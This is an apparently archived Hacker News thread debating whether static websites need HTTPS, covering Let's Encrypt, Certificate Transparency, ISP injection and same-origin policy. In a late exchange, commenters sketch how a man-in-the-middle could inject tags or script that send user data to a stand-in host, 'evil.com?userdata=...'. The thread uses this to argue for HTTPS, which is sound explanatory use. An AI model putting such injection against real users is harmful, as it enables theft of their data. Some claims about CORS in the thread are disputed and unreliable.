
Why Static Websites Need HTTPS - edward
https://www.troyhunt.com/heres-why-your-static-website-needs-https/
======
tambourine_man
Let's Encrypt is one of the best things that happened to the web recently. I
wish we had more choices though. Relying so much on a single party is
unnerving.

~~~
nofunsir
Do we have conclusive evidence yet that LE is not a honey pot? I mean, if _I_
were the NSA...

~~~
parliament32
It's a valid question, with two possible threat models:

1) the honeypot uses your private keys to MITM connections

Let's Encrypt doesn't handle your private keys. You generate them yourself,
and submit a CRL to LE to get a cert issued. They have no knowledge of your
private key.

2) the honeypot issues fake certs

Let's Encrypt submits a log of every cert issued, see
[https://crt.sh/](https://crt.sh/) . To verify, it'd be pretty trivial to
create a browser extension (if one doesn't exist already) that checks whether
certs you encounter appear in the certificate log.

~~~
tialaramex
For CT the finished system involves browsers checking that the server can
prove its certificates were logged (the ones you get from Let's Encrypt have
such proof embedded) and periodically talking to Log Monitors (e.g. owned by
your browser vendor) about proofs it has seen.

If somebody has seen a proof that is contradicted by the published log state
this means the Logs involved are corrupt. If an otherwise authentic cert is
shown without proofs or those proofs are bogus the cert may have been unlogged
for nefarious reasons, it shouldn't be accepted and needs reporting

Chrome has the start of this, it checks for the proofs. Firefox is getting
roughly the same feature "soon". But the finished system with all bells and
whistles is probably a year or five away.

Good news is that even unfinished CT has been very effective.

------
adwhit
When I read things like that, I always think of the paper "The Rational
Rejection of Security Advice by Users". [1]

Yes, content injection is bad, but the chance of it happening multiplied by
the damage it could cause to your users is probably less than the the effort
required to shift a static blog site to HTTPS. (Do not underestimate the leap
in difficulty from copy-pasting from an Nginx tutorial to understanding how
Let's Encrypt works).

[1]
[https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.p...](https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.pdf)

~~~
th3l3mons
The other side I would pose is: do you want anyone to alter your responses?
I'm currently trying to find the RFC, but I recall an ISP defining an RFC for
tampering with HTTP responses in-transit. In addition, I also recall seeing
Comcast (I believe) injecting JS to users that they are approaching their plan
limits.

Obviously, not the end of the world. But do you want any third party to easily
alter the response from your server to the client(s)?

~~~
Aaron1011
I believe you're think RFC 6018:
[https://tools.ietf.org/html/rfc6108](https://tools.ietf.org/html/rfc6108)

Related HN discussion:
[https://news.ycombinator.com/item?id=15890551](https://news.ycombinator.com/item?id=15890551)

------
nanoscopic
I admin a number of different websites. The majority of them are static. I
have forced https redirect on some of them. On others I do not.

The only benefit of https I perceive in the case of static public content is
that ISPs cannot easily monitor which specific pages on my domains are being
visited. With plain http they could.

I don't particularly care if people get MITM'ed when visiting my static sites.
If they did so it generally is because they chose to use unsafe public access
points ( wifi ). This extends to some degree to all forms of wifi since so
many security forms in use on them can be easily broken.

My current understanding is that enterprise encryption using certs with wifi
is still secure and cannot currently be broken.

The only other party would could do MITM against normal customers on their own
home internet, while using wired connections, is, I believe, the ISP
themselves. Random third parties cannot generally do so. If there is some
plausible way they can do so I would like to hear it.

If your ISP is MITMing you, I think you have bigger problems then whether they
change the content of my static site when you visit it. If they were, they
could potentially target your initial download of your browser and downgrade
to http to infect your browser so that you never realize after that that https
is faked out...

I think there are caching benefits to using plain http. The primary one is so
that your ISP can cache your static content and save internet bandwidth
globally.

~~~
fmpwizard
> generally is because they chose to use unsafe public access points

It sounds like you are penalizing users for not using a vpn or some other
method when out of their homes. Yes, people can do that, but in 2018 having
https on the sites you manage is a lot easier than asking every possible
visitor to use a vpn. I hope you would reconsider and enable https on all the
sites you are an admin.

> If your ISP is MITMing you, I think you have bigger problems then whether
> they change the content of my static site when you visit it. If they were,
> they could potentially target your initial download of your browser and
> downgrade to http to infect your browser so that you never realize after
> that that https is faked out...

They could, and maybe in countries other than the US you have plenty of ISP
choices, but in many places in the US, you are stuck with just one ISP.

And so far, we know that ISPs are manipulating http traffic but so far they
haven't gone all the way to give you an infected browser. Again, it is
possible, but I think that a better approach is if we all do as much as we can
to help each other, the internet could be a better place.

~~~
Jach
It's all good to point this out, but it's a social argument, not a technical
one. If the technical arguments have been eliminated (e.g. you have no
technical use for encrypting the connection) then you're left with "Join us in
giving the finger to ISPs/cafe routers that inject foreign JS!" Don't be upset
when people say "Meh. Take it up with those ISPs directly, or with web browser
vendors, I don't care and don't want to join your crusade." At some point web
browsers will stop serving content over HTTP unless perhaps with a custom flag
turned on, and even then, some people will still not use HTTPS.

------
iamben
Two stories.

Firstly, I had a fair amount of websites with a now EIG owned company for
about 10 years. It was just a shared host, but they're all low traffic, and I
could easily add a domain name and spin up a blog/project. A few years back I
needed https for an API I was working with - the cost was something like $40 a
year for the domain, for a project that wasn't a money spinner. So I found
another (read: free) way to access the API.

Earlier this year I asked again. It was something like $20-$100 per domain to
put an https cert in place, even if I got it myself from LetsEncrypt. As the
entire package was about about $100 a year (up 30%, with worse customer
service since EIG took over) I finally took the step and moved all my sites
elsewhere. The new host isn't much more expensive, but provides free
LetsEncrypt with a click from the controlpanel. I now use https on most
things.

Secondly, I have a few sites with a decent number of FB likes that have
counted up as the result of some viral/social campaigns in the past. None have
forms on, all are links to elsewhere. Currently those likes work as (not
insignificant) social proofing. Move the site from http to https and I lose
the count on the Like button.

The cost in the first point (or the effort/time/cost in moving everything)
just hadn't been worth it for the smaller stuff. Facebook not sorting the
counts hasn't made it worth it in the second. I suspect my reasons are 2 of
many that stop people from upgrading - I guess I'm just saying that even with
the best intentions, there are other factors at play that prevent John
Everyman from making the move. Make it easy/default for him, more https
everywhere.

~~~
thaniri
You can set up your apache/nginx or whatever webserver to redirect http
requests to https. That way you can still link to your website with an
[http://](http://) URL.

~~~
iamben
Appreciated, but this is a hacky solution. If you use the graph explorer, both
the http and https addresses have different counts. It's very frustrating -
shouldn't be that way.

~~~
prophesi
Add your site to the HSTS Preload List, then it'll be very unlikely to have
any HTTP hits.

~~~
iamben
Didn't realise that existed. Very useful thanks!

But again, it's not exactly up there for John Everyman - and it doesn't sort
Facebook having different share counts for the https and http domain.

~~~
prophesi
True. And you have to be extra careful with HSTS Preloading; if one of your
subdomains breaks because of HTTPS, it'll be a pain to get your domain taken
off the list.

------
davidmurdoch
And one reason it doesn't:
[https://meyerweb.com/eric/thoughts/2018/08/07/securing-
sites...](https://meyerweb.com/eric/thoughts/2018/08/07/securing-sites-made-
them-less-accessible/)

Secure websites make the web _less accessible_ for those who rely on metered
satellite internet (and I'm sure plenty of other cases).

Know who your demographic is and make sure you don't make things more
difficult for them. Maybe provide an option for users to access your static
site on a separate insecure domain, clearly labeled as such.

~~~
tialaramex
Having very high packet loss means something is badly wrong. A good wire-level
(yes I know, there are no wires, nevertheless) protocol aims to hit lower
packet loss rates by fiddling with other parameters. Example: Let's say you
have 40MHz of assigned frequencies, but when both ends measure they find 4MHz
of that is full of noisy crap, the rest is fairly quiet. Well, rather than
lose bits in those 4MHz and toss away many packets, why not keep 36MHz with a
much lower error? If only 6000 packets per second get through of 10 000 sent,
then an option to send 9000 and receive 8000 of them is already a win.

Now, upgrading satellites is trickier and more expensive than upgrading your
home cable box, at the extreme obviously sending a bloke up to "swap out this
board for a newer one" is either tremendously difficult or outright impossible
depending on the orbital characteristics. But we shouldn't act as though high
packet loss rates at the IP layer are to be expected, they are avoidable. And
fixing them will do a lot more than just enable HTTPS to work better.

~~~
zaarn
>But we shouldn't act as though high packet loss rates at the IP layer are to
be expected, they are avoidable. And fixing them will do a lot more than just
enable HTTPS to work better.

At that distance the very physical latency limit is almost a second. You can
literally not go below. The high latency will have a lot of protocols simply
time out or consider the packet lost.

At that distance you need some well engineered ground equipment to handle the
signal losses. A dish and a high powered transmitter that need to be within a
degree of the target. If you're off by a degree you're likely going to hit
very bad packet loss. A degree is not much and you could be cause by the
ground below stretching and twisting over the day due to temperature changes.
TV doesn't have to deal with sending data up the link other than using the
massively more powerful and expensive dishes from TV networks.

Lastly, from ground to geostationary orbit you may find that your 40MHz band
is full of crap. Not because someone else is sending but because you're
sending through a solid belt of radiation and magnetic flux. You'll find that
for a wide range of bands they either suck at penetrating the atmosphere,
penetrating the magnetic field or get sucked up by interference from half the
universe.

The layers above IP have ways to handle packet loss for a reason (although the
reason was bad copper cables and bad MAC). Also, the MAC is another problem;
you're not the only one who wants to use the very limited resources of the
sat. One of the most common and effective forms of bandwidth limiting is
dropping packets and it's normal. Packets drop all the time, every TCP
connection drops packets. It happens and almost all protocols deal with it on
one level or another.

------
peterwwillis
If browsers supported a method to provide content securely without the need to
encrypt everything, lots of uses of the web would not be hampered by the TLS-
everything-that-moves movement. The limitations we have accepted in our
browsers are what causes these conflicts. But we don't have to accept them. We
could do with less propaganda and more compromise and innovation.

~~~
ezekg
I'm unsure on how you could do what you've said without encryption. Any ideas?

~~~
maxvu
Cryptographic verification?

~~~
ezekg
Sure, but that would still leave the data open to the world. Not an
alternative to TLS.

~~~
peterwwillis
Most of the content on the web is intentionally open to the world.

~~~
ezekg
But our personal data is not. So much data is potentially made available from
an unencrypted HTTP request.

~~~
peterwwillis
Nobody is saying that personal data should be unencrypted.

------
patrickmcmanus
the post is good.. but also: confidentiality matters.

Think about a library. There are no secrets in the stacks that need to be kept
from public disclosure. What is secret is the act of using the library - i.e.
what they choose to read.

------
cm2187
Actually one service that DNS providers should offer is generating and
renewing let's encrypt wildcard certificates automatically, and offering their
clients to download them through some API. That would make life a lot easier
for less technical devs who are intimidated by the complexity of pki.

------
ecesena
Github pages supports TLS even for custom domains now, via Let's Encrypt. At
this point, I don't think there's any excuse anymore for having a static
website without TLS. Either use Github pages, or just use your favorite
hosting provider and put a CDN in front of it.

Note: I'm not affiliated to Github, but I've used them multiple times, and
just recently discovered they now support TLS. If you want to see an example:
[https://solokeys.com](https://solokeys.com) is hosted on Github pages.

~~~
mr_toad
As far as I know Github is the _only_ static site provider that will do this
for you.

I’m scratching my head trying to figure out the best way to do automated
certificate renewal for othe providers. It’s not like you can run certbot on a
static page.

~~~
ValentineC
> _As far as I know Github is the _only_ static site provider that will do
> this for you._

Netlify automatically does this [1], and Zeit's Now too, I think [2].

[1] [https://www.netlify.com/docs/ssl/](https://www.netlify.com/docs/ssl/)

[2]
[https://zeit.co/docs/examples/static](https://zeit.co/docs/examples/static)

------
zzzcpan
Here's the truth about security: people are clueless about it and so
corporations and governments abuse that by pushing their own agendas, not
related to security.

Same corporations that tell you to "secure" your unimportant static website
with https also want to force you to run random javascript in your browser
from unknown parties, identify you at all times, link everything to your phone
number, etc. In the end we are all going to be worse off with this let's
encrypted web, with more control than ever in the hands of those few US
corporations.

~~~
yjftsjthsd-h
How are those related? Letsencrypt doesn't try to identify anyone, and
certainly doesn't run JavaScript on your site.

~~~
grosjona
I wonder what would happen if Let's Encrypt started charging for their service
AFTER HTTPS became compulsory. Seems like a great (but evil) business
strategy. All these CAs could just start increasing their prices and we'd all
be forced to pay.

If you understand human behavior, then you know that this WILL happen
eventually.

~~~
tialaramex
This might even make sense as "a great (but evil) business strategy" except
Let's Encrypt isn't a business, it's provided by a charity, ISRG, the Internet
Security Research Group, set up for exactly this purpose by people from
Mozilla (a charity) and the EFF (another charity)

I suspect that the people behind ISRG weren't as paranoid as the Free Software
Foundation about being corrupted by some hypothetical evildoers (the FSF has a
whole mechanism to try to ensure that if you somehow take over the Foundation
you can't use its resources to counter its original purpose) but you're going
to need a bit more than a vague idea that people are capable of evil as an
explanation for why good things are actually not good.

~~~
schoen
I don't know who has what legal remedies when a nonprofit acts
inappropriately, but another observation is that most of Let's Encrypt's
technology is developed in public.

[https://github.com/letsencrypt](https://github.com/letsencrypt)

If you needed to set up another ACME-compatible CA on the same model (which
could then be a drop-in replacement compatible with the existing client base),
it would be a lot less expensive (although it would require datacenter build-
out, hiring an operations team, and a variety of PKI-specific stuff like key
ceremonies, HSMs, cross-signing, CPS, and audits).

------
gt2
A big reason is that Chrome (and others?) specifically show 'Not Secure' for
all sites not using https.

~~~
H1Supreme
This is a massive reason, imo. The average user views that url annotation as a
bad thing. They don't know it's static, or even what "static" refers to.

~~~
AgentME
Even if they knew the site was static, "not secure" would still be valid. An
ISP or malicious wifi network may be recording their browsing history,
downsampling images, injecting or replacing ads, replacing executables with
backdoored versions, adding fake login forms or popups to get the user to give
a password of theirs, etc.

------
Fnoord
What if your website is only accessible for you from within your LAN? Such as
your router, LAN, or your settopbox? If you have DHCP as well and don't
control the DNS or don't have root (such as on IoT devices) then you cannot
use Lets Encrypt. Or am I missing something?

~~~
berbec
I used to have a $75 netgear router at my house. I changed the local DHCP
settings to give out a raspberry pi's internal as DNS. I run dnsmasq on the pi
and resolve local hosts that way. Ever internal service in my house uses HTTPS
and I have about a dozen.

~~~
logan12358
Sorry this is a day late, but how do you get certificates for internal
services? Do you manually trust them on each client? Or do you have a wildcard
cert from a public server? Is there some cleaner way to manage internal HTTPS?

~~~
berbec
I resolve internal services as subdomains of a domain I own. I use a wildcard
I get assigned on an EC2. I script an sftp upload of the a new cert every
renewal to my main internal machine where it is shared via nfs. This is the
simplest way I've found.

------
alerighi
The drawback to use https everywhere is that a big company can't cache locally
things that gets downloaded again and again from the network like OS and
application updates, videos on the web, and so on

I think that we need an alternative to https, a protocol that guarantees only
authentication (sing the packets, basically) and doesn:t encrypt content, you
can verify that what you get is what the website owner intended (no mitm) and
you can have a cache.

------
Sohcahtoa82
I feel like this article has been posted a dozen times already, but the "past"
link is showing this as the only submission.

EDIT: Nevermind, I'm confusing it with similar discussions:

[https://news.ycombinator.com/item?id=17651652](https://news.ycombinator.com/item?id=17651652)

[https://news.ycombinator.com/item?id=17599022](https://news.ycombinator.com/item?id=17599022)

[https://news.ycombinator.com/item?id=17605973](https://news.ycombinator.com/item?id=17605973)

------
zaarn
There is one static webpage that I won't put HTTPS on; the dashboard of my
pi.hole.

Though it's more of an architectural decision as it enables the DNS server to
blackhole HTTPS more effectively (since it just gets a CONNREFUSED back).

Really, it's an exception to the rule and only because I can't ask my guests
to install my pihole CA on their devices (many of which don't support that
stuff anyway).

Well and there is that other website but the prime directive forbids that I
mention it...

~~~
Avamander
You can buy a domain name and do DNS auth. Requires no open ports and you'll
get a trusted cert for that one Pi. I did it for mine (but with SNI
verification).

~~~
zaarn
Pi.hole, it's only local and there is a reason it doesn't open port 443 and
only works on 80. On a local non-wireless LAN this is not a concern in my
threatmodel.

------
Mikhail_Edoshin
I went there to see why and the only subhead I understood without searching
was "HTTPS is easy". I gather, only HTTPS is easy nowadays :)

------
casper345
Not security related, but for SEO having HTTPS will treat your website with
more mercy in the storm of google searches

------
hiccuphippo
How can I go about securing a server without a domain? Just a static IP? Let's
Encrypt doesn't allow IPs and the owner doesn't care for a domain.

Context: small business with a web based application in a local server, all
they need is to be able to access reports from their phone.

~~~
detaro
Self-signed certificate (or own CA and certificate signed by that). Buying a
certificate for an IP is more expensive than a domain.

~~~
hiccuphippo
I've tried self-signed certificate somewhere else but it seems Chrome doesn't
add the certificate permanently so every few days they get the "scary" not
secure window again.

I'll try with my own CA.

~~~
breakingcups
Can I suggest registering a domain for $1, pointing that at the IP and using
LetsEncrypt? Probably less effort in the long run.

------
grosjona
I think that the argument that you can't trust ISPs is weak.. With HTTPS, you
still need to trust certificate authorities. It is somewhat suspicious that
Google suddenly decided to create their own Certificate Authority in 2017.
Forcing every website to use HTTPS just reduces the pool of entities who are
able to track and manipulate us and it gives a false sense of security.

There is no doubt that this change is designed to take power away from some
entities and to put it in the hands of a few key players which Google trusts.

Also, the video created by the author is highly deceptive; the author makes it
look like he has hacked the website itself; in reality, he has only
intercepted the traffic to his own machine so in reality he has only modified
his own view of the website; he hasn't actually hacked anything. I'm sure that
the author is being intentionally deceptive; he knows exactly who the target
audience for that video is and he knows exactly what it looks like.

~~~
AgentME
Certificate authorities that participate in Certificate Transparency are
forced to publish all certificates they issue, so site owners can tell if a
fraudulent certificate for their own domain is ever generated. I think
browsers are pushing for all CAs to adopt Certificate Transparency. This
greatly reduces the power of malicious CAs.

------
AnaniasAnanas
All websites need onion/i2p addresses, not HTTPS.

------
bullen
chrome://flags

Mark non-secure origins as non-secure

Disabled

------
EGreg
People here are bringing up the difficulty for a regular user to set up HTTPS.

I want to go one further: WHY does a regular user need to buy a human-readable
domain name, maintain it, and pay for a hosting company to host on that
domain?

It used to be worse - you had to have your own machine or use some crappy
shared hosting service. Amazon figured out that letting people share managed
virtual machine instances was good savings. That’s now called “the cloud” but
it’s still under the control of some landlord - Amazon, DigitalOcean, etc.

Let’s face it, the easiest thing we have today is some web based control panel
by CPanel running on some host that charges $5/month or something.

It’s 2018. Why don’t we have something like MaidSAFE and Dat working yet? We
should have:

    
    
      1) End to end encryption
    
      2) One giant, actually decentralized cloud composed of all nodes running the software
    
      3) Storing chunks of encrypted data using Kademlia DHT or similar
    
      4) Maybe even periodic churn on the back-end so you can’d find and collude with the servers hosting the chunks
    
      5) All underlying URLs would be non-human-readable and clients would display (possibly outdated) metadata like an icon and title (this metadata may change on the Web anyway). Storing and sharing could occur using QR codes, NFC bluetooth, Javascript variables, or anything else. For static files, the links could be content-addressable.
    
      6) All apps and data would be stored encrypted in the cloud and only decrypted at the edges. They would run on the clients only. Apps could also be distributed outside the cloud, but usually just via a link to a cloud URL.
    
      7) Communities would likewise be just regular users, rather than private enterprises running on privileged servers running some software like github is now. No more server side SaaS selling your data or epic hacks and breaches. 
    
      8) Users would have private/public key pairs to auth with each community or friend. They would verify those relationships on side channels for extra security if needed (eg meet in person or deliver a code over SMS or phone). Identity and friend discovery across domains would be totally up to the user.
    
      9) Private keys would never leave devices and encryption keys would be rotated if a device is reported stolen by M of N of other devices.
    
      10) Push notifications would be done by shifting nodes at the edges, rather than by a centralized service like Apple or Google. In exchange for convenience, they can expose a user to surveillance and timing attacks.
    

No more waiting endlessly to be “online” in order to work in a SaaS document.
The default for most apps is to work offline and sync with others later.

No central authorities, CAs or any crap like that. Everything is peer to peer.
The only “downside” is the inability to type in a URL. Instead, you can use
one or more indexes (read: search engines) some of which will let you type
existing URLs, or something far more user friendly than that, to get to
resources.

Domains and encryption key generation would be so cheap that anyone can have a
domain for a community of any kind, or even just for collaborating on a
document.

There won’t any longer be a NEED for coupling domains to specific hardware
somewhere, and third party private ownership/stewardship of user-submitted
content would be far less of a foregone conclusion, fixing the power imbalance
we have with the feudal lords on the Internet today.

Once built, this can easily support any applications from cryptocurrency to
any group activities, media, resources etc.

If you are intrigued by this architecture, and want to learn more or possibly
get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!

~~~
Avamander
> I want to go one further: WHY does a regular user need to buy a human-
> readable domain name, maintain it, and pay for a hosting company to host on
> that domain?

Because there's no interest in that. Getting a domain name is already cheap
and easy.

> Storing chunks of encrypted data using Kademlia DHT or similar [...]

I've yet to see any P2P system have low latency, high speed and high
reliability.

> All underlying URLs would be non-human-readable and clients would display
> (possibly outdated) metadata like an icon and title (this metadata may
> change on the Web anyway). Storing and sharing could occur using QR codes,
> NFC bluetooth, Javascript variables, or anything else. For static files, the
> links could be content-addressable.

Why?

> The only “downside” is the inability to type in a URL.

Good luck saying to your friend the nice webstore you got your hoodie from is
[insert non-readable non-pronounceable url].

> and third party private ownership/stewardship of user-submitted content
> would be far less of a foregone conclusion

This is unacceptable for law enforcement

> If you are intrigued by this architecture, and want to learn more or
> possibly get involved, contact greg+qbix followed by @ qbix.com - we are
> BUILDING IT!

Oh this is an ad...

~~~
fwip
I'm not trying to advertise, but Beaker browser does a real good job of making
p2p delivery transparent to the end user. It's probably slower than most sites
in normal usage, but certainly acceptable speeds for static sites, and it
performs better under the hug-of-death a site gets when posted on Hacker News.
:)

Plus, it already has existing methods to map DNS records or servers to the p2p
records, so I can access dat://beakerbrowser.com/ or dat://epa.hashbase.io/
and get it served across the p2p network or pull it up offline if I've viewed
it before.

------
some_account
Why wouldn't you? It took me 30 mins to read and set up a cert from let's
encrypt.

~~~
gt2
Don't underestimate the weight of decisions, let alone the knowledge of a
choice, and the care.

Also, see how often humans don't change from default settings -- ringtones,
bootstrap themes, etc..

------
austincheney
I have recently adopted HTTPS on my own site, because there are substantial
performance benefits with HTTP/2 that are only available over HTTPS.

There are many arguments in the article, and more that he links to, arguing
for the security benefits of HTTPS. HTTPS is good for protecting content.

One very serious argument that HTTPS evangelists avoid is when there is no
content to protect the security benefits of HTTPS evaporate. My site is a web
application that stores all user data in their browser. Their data does not
come back to the server. The only thing that crosses the wire is a request for
the application code and a response with that code.

I would argue this model of application is substantially more secure that
sending data across the wire regardless of whether that transmission is
encrypted. There is nothing individually identifiable or preferential about
the application code. The content, identifiable information, and
personal/private details remain with the user where they reside anyways.

\---

EDIT

Before everybody jumps on the MITM attack bandwagon be aware of
[https://en.wikipedia.org/wiki/Same-
origin_policy](https://en.wikipedia.org/wiki/Same-origin_policy)

A man in the middle attack can void the integrity of data crossing the wire,
but it cannot trivially break privacy with simple modifications to code. This
is by design in the architecture of the web.

The only violation in question is code integrity (availability portion of the
security CIA triad). Fortunately, this is a solved problem so long as the
application is open source. If an integrity violation occurs that renders the
application defective simply compare the transmitted application code against
the stored publicly available application code. This is made easier when the
application in question is a diff tool that can fetch code from across the
wire.

~~~
gsnedders
> One very serious argument that HTTPS evangelists avoid is when there is no
> content to protect the security benefits of HTTPS evaporate. My site is a
> web application that stores all user data in their browser. Their data does
> not come back to the server. The only thing that crosses the wire is a
> request for the application code and a response with that code. I would
> argue this model of application is substantially more secure that sending
> data across the wire regardless of whether that transmission is encrypted.

That's a case where HTTPS really is essential! If you serve your application
code over HTTP, then I can MiTM that connection and replace your application
code with something that reads all the user data from the user's browser and
then sends it to evil.com.

~~~
austincheney
No. [https://en.wikipedia.org/wiki/Same-
origin_policy](https://en.wikipedia.org/wiki/Same-origin_policy)

~~~
AgentME
If evil.com serves the proper CORS headers, then any site is allowed to make
AJAX calls to it.

Also, the attacker could inject <img> tags with a src attribute pointing to
"[https://evil.com?userdata=..."](https://evil.com?userdata=...").

Also, if the attacker is already man-in-the-middle attacking yoursite.com,
they could make the site's code make ajax calls to "yoursite.com/nothing-to-
see-here". Users looking at the network requests may not notice anything is
going on.

~~~
austincheney
CORS requires an HTTP header white listing allowed domains. If the attacker
can modify the HTTP headers they don't need to modify the HTTP body in order
to perform an attack.

> Also, the attacker could inject <img> tags

First, the image needs to be requested using the same protocol that requested
the page or it will notify the user of insecure assets. Second, but they would
have to write a custom script to gather the data to append as the URI query
string. Third, the image would need to be injected after the user has manually
entered information to the site, which eliminates static images in the HTML
source. Fourth, actually test this. When I test it I get a CORS error in the
browser. Strangely, Chrome reports this as a warning instead of as an error,
but the request is blocked and it never leaves the browser.

> Also, if the attacker is already man-in-the-middle attacking yoursite.com,
> they could make the site's code make ajax calls to

No, that is not allowed by the browser and will throw an error. It violates
same origin policy. If you can figure out how to break same origin policy
Google will pay you $5000 for reporting a significant issue to their bug
bounty.

~~~
AgentME
>CORS requires an HTTP header white listing allowed domains. If the attacker
can modify the HTTP headers they don't need to modify the HTTP body in order
to perform an attack.

The attacker owns evil.com. They can make it have any headers they want, and
then javascript on yoursite.com or any other site is allowed to make ajax
requests to it. (Of course, they'd still need to do a man-in-the-middle attack
on yoursite.com to modify yoursite.com's javascript. They technically don't
need to involve evil.com if they're MITMing yoursite.com as I mentioned at the
end of my post above, but it is a technically possible thing for them to do.)

> First, the image needs to be requested using the same protocol that
> requested the page or it will notify the user of insecure assets.

The attacker can make evil.com use HTTPS if they need to. There's no
restrictions stopping attackers from getting certificates for their own
domains. HTTPS doesn't signify that the owner of the domain is trustworthy; it
just signifies that the contents you receive from a URL weren't MITMed.

> Fourth, actually test this. When I test it I get a CORS error in the
> browser. Strangely, Chrome reports this as a warning instead of as an error,
> but the request is blocked and it never leaves the browser.

Did you test this on HN? HN uses an unusually restrictive Content-Security-
Policy header to restrict where assets can be loaded from. It is a protection
against this sort of attack, but only a weak one against a determined attacker
who can manipulate page javascript or html: An attacker could make every
element on the page be a link to evil.com?userdata=..., which a lot of users
will probably click. The user might realize something is up, but the attacker
has already gotten their data so it's a bad consolation prize. Also, in the
specific case of MITM attacks, CSP is no help since an attacker can just strip
the header off.

>No, that is not allowed by the browser and will throw an error. It violates
same origin policy. If you can figure out how to break same origin policy
Google will pay you $5000 for reporting a significant issue to their bug
bounty.

(I don't mean to brag, but just to point out a possibly relevant credential: I
have gotten a 4-digit bug bounty payment from Google before.)

If an attacker MITMs yoursite.com and modifies the javascript served by
yoursite.com, then when a user navigates to yoursite.com, that javascript is
allowed to connect to yoursite.com (or any domain that is served with CORS
headers). The same origin policy is about preventing a domain from accessing
domains that don't want to be accessed; it is not about preventing a domain
from talking to anyone at all including itself. (Content-Security-Policy does
focus on that, but it can be difficult to make bulletproof and should be
treated as a defense-in-depth, and it's not relevant to MITM attacks at all
since a MITM can just strip it.)

~~~
austincheney
> The attacker owns evil.com. They can make it have any headers they want, and
> then javascript on yoursite.com or any other site is allowed to make ajax
> requests to it.

Only if the page is originally requested from evil.com or if evil.com is
listed in the CORS http header from the legitimate domain.

In order for this attack to work evil.com needs to be added to the CORS list
in the http header and JavaScript needs to be inserted into the page body to
make XHR calls to the evil.com domain.

> Did you test this on HN?

I tested it on a couple of sites both with http and https. It is not a valid
vector of attack. Don't take my word for it. Try it.

\---

All these technical conversations are really a red herring based upon the
untested assumption that modification of page traffic is trivial if the page
is served over HTTP. While this is possible it isn't trivial and requires
multiple stages of compromise.

Typically man in the middle attacks refer to encrypted traffic, such as HTTPS,
instead of plain text traffic. The benefit of a man in the middle attack is
that the attacker is in the encrypted tunnel between the two end points
reading data that is otherwise encrypted and thereby voiding any benefit of
encryption.

Modifying traffic is less trivial than reading traffic. It is certainly less
valuable when there are security conventions in place to ensure end point
authenticity, as in limited to only locations that are available by address
and policy.

> I don't mean to brag, but just to point out a possibly relevant credential:

Don't care. I myself have found and reported a critical flaw in V8 that broke
recursive function access under certain conditions. I don't remember when the
resolution was released to V8, but it was first available to Node with 4.2.4
on 2015-12-23. All prior versions of V8 were impacted.

> If an attacker MITMs yoursite.com and modifies the javascript

And how would you do that? I have not seen anybody prove they can both MiTM a
production site and modify the data in a way that breaks same origin policy
yet everybody says its trivial. If you really want to brag and get another 4
digit bug bounty then prove that.

~~~
icebraining
_if evil.com is listed in the CORS http header from the legitimate domain._

That's not how CORS works; the header is read from the domain being called
from JavaScript, not from the domain where the JavaScript came from. So in
this case, the injected JS will call evil.com, and so the CORS headers will be
read from evil.com.

------
Qub3d
I'm going to sorta break the prime directive and link the n-gate rebuttal to
these articles: [http://archive.fo/xcQ5j](http://archive.fo/xcQ5j)

Its a bit heavy-handed, but it does bring up a good point: A lot of this
argument for HTTPS-by-default is all on top of assumptions about who is
responsible for data security. We're doing a lot and things are improving, but
the general public still are all yelling at websites for misusing data that we
willingly gave over in the first place [0].

[0]:[https://xkcd.com/743/](https://xkcd.com/743/)

~~~
mo3gut
> assumptions about who is responsible for data security.

The chief assumption appears to be "anyone but the browser vendors". Let us
consult the article:

    
    
      BeEF
      This, to me, was the most impactful demo
    

Quite the endorsement. So what's BeEF's angle?

"...examines exploitability within the context of the one open door: the web
browser."

There could hardly be a clearer expression of contempt for the browser
vendors' offerings. But remember, the "open door" is nothing to do with them,
it's all your fault for not serving via HTTPS.

Welcome to Clown World.

~~~
pixl97
Eh, there are two execution contexts here.

1\. The web browser executing the injected data stream it receives from the
remote computer.

2\. Your brain interpreting 'non-executable' instructions as received from
your browser.

Browser security has nothing to do with me going to 'xyz.com', which is the
trusted website for xyz company, and being fed a MiTM telling me to go to a
bad phone number for support.

